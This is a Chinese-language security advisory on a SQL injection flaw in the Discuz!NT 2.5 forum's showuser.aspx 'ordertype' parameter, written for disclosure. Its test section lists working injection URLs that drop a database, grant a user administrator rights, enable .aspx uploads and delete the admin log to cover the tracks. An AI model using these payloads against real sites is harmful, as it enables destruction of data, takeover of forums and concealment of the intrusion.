安全研究

安全漏洞
Discuz!NT 2.5 showuser.aspx脚本SQL注入漏洞

发布日期:2008-08-27
更新日期:2008-08-29

受影响系统:
康盛创想 Discuz! NT 2.5
描述:
Discuz!是一款华人地区非常流行的Web论坛程序。

Discuz!NT 2.5版本中的showuser.aspx脚本没有正确地过滤用户请求中的ordertype变量,导致SQL注入漏洞,恶意攻击用户无需用注册账户,只要精心构造ordertype即可利用此漏洞在论坛执行任意管理操作。

<*来源:I.S.T.O
  
  链接:http://blog.csdn.net/I_S_T_O/archive/2008/08/28/2843681.aspx
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='webtets';--//更新为管理员
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='aspx' where extension='jpg';-- //更新为aspx可上传
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='aspx';-- //更新回JPG
http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='webtets';-- //删除日志
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='webtets';--//取消管理员

建议:
厂商补丁:

康盛创想
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.comsenz.com/index.php

浏览次数:3984
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障